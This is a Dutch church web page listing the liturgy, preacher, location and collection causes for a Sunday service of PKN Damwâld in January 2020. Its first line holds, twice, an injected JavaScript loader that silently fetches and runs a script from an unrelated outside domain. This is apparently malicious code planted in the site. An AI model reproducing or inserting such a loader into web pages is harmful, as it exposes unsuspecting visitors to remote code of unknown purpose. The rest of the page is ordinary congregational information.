;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Kerkdienst zondag 5 januari 2020 9:30 uur - PKN Damwâld
zondag 5 januari 2020
09:30 uur

Kerkdienst zondag 5 januari 2020 9:30 uur

Thema: Uw Koninkrijk kome

Informatie

Voorganger:Ds. G. J. van Wieren, Oosternijkerk
Organist:Nienke van der Heide-Visser
Thema:Uw Koninkrijk kome
Liturgie
Lied voor de dienst NLB 489
Welkom
We zingen: NLB 971
Stilte van voorbereiding, Votum en groet
Gebed
We zingen: NLB 885
Tekst van de week : Marcus 10 : 44
We zingen: NLB 534
We lezen: Marcus 1 : 1-15
Verkondiging Uw koninkrijk kome
We zingen: NLB 498
Gebed
Collecte
Slotlied NLB 704
Zegen
Liturgie met de liedteksten is alleen beschikbaar met een Mijn Kerk account. Inloggen
Locatie: Bonifatiuskerk Foarwei 2, Damwâld
Dienst terugluisteren Dienst terugluisteren
Collecte informatie
Eerste collecte: Lichtpunt

Lichtpunt te Kollumerzwaag
Het Lichtpunt in Kollumerzwaag is een stichting die vanuit Christelijke levensovertuiging hulp biedt aan mensen die dat nodig hebben. Zonder subsidie van de overheid, gesteund door verschillende kerken, wordt deze hulp aangeboden door beroepskrachten en vele vrijwilligers. Het Lichtpunt heeft veel te bieden, namelijk opvang, begeleiding, dagbesteding in eigen kaarsenmakerij en ontmoeting.

Tweede collecte: Kerk
Uitganscollecte: Bouwfonds